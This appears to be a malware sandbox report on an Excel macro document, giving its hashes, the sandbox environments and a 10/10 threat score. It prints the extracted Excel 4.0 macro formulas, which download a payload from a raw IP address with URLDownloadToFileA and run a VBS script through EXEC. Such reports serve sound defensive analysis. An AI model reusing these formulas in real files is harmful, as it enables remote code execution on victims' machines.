General
Target: 286c28e6219d609162a753d5bb6586d6
Size: 6KB
Sample: 231221-3my4dsbdfp
MD5: 286c28e6219d609162a753d5bb6586d6
SHA1: adfb68e16213829c0a66abf5ee44d707c1e1609e
SHA256: b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7
SHA512: 0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a
SSDEEP: 192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD
Static task: static1
Behavioral task: behavioral1
  Sample: 286c28e6219d609162a753d5bb6586d6.xlsm
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 286c28e6219d609162a753d5bb6586d6.xlsm
  Resource: win10v2004-20231215-en
Malware Config
Extracted URLs:
  http://46.17.98.187/index.php
  http://google.com/index.php
Extracted formulas (Excel 4.0 macro):
  =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
  =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
  =EXEC("wscript C:\zer\spp.vbs")
  =HALT()
Targets
Target: 286c28e6219d609162a753d5bb6586d6
Score: 10/10
Signatures:
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Process spawned suspicious child process
  This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.